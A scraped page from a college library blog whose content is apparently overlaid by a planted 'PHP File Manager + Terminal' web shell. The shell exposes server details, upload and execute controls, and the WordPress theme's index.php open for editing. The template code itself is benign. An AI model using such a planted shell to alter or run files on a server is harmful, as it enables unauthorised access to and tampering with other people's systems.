Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //var/www/html/library/wp-content/themes/coldbox Upload Create File Create Folder Execute Editing: /var/www/html/library/wp-content/themes/coldbox/index.php<?php /** * The template for displaying index pages. * * @since 1.0.0 * @package Coldbox */ get_header(); ?> <main id="main" class="home" role="main"> <div class="container-outer"> <div class="container"> <div id="content" class="content"> <?php $cd_class_status = have_posts() ? 'view-has-post' : 'view-no-results'; ?> <div class="content-inner <?php echo esc_attr( cd_index_style() ) . '-view'; ?> <?php echo esc_attr( $cd_class_status ); ?>"> <?php // Call the top parts. apply_filters( 'cd_archive_top_contents', cd_archive_top_contents() ); ?> <?php if ( have_posts() ) : $cd_post_count = 0; while ( have_posts() ) : $cd_post_count++; the_post(); ?> <?php if ( cd_index_style() === 'grid' ) : ?> <?php get_template_part( 'content', 'grid' ); ?> <?php elseif ( cd_index_style() === 'standard' ) : ?> <?php get_template_part( 'content', 'standard' ); ?> <?php endif; ?> <?php do_action( 'cd_archive_midst_content', $cd_post_count ); ?> <?php endwhile; ?> <?php // Call the bottom parts. apply_filters( 'cd_archive_bottom_contents', cd_archive_bottom_contents() ); ?> <?php else : ?> <div class="error-messages coldbox-no-results"> <h2><?php esc_html_e( 'Posts Not Found!', 'coldbox' ); ?></h2> </div> <?php endif; ?> </div> </div><!--/.content--> <?php get_sidebar(); ?> </div> </div> </main> <?php get_footer(); ?> Save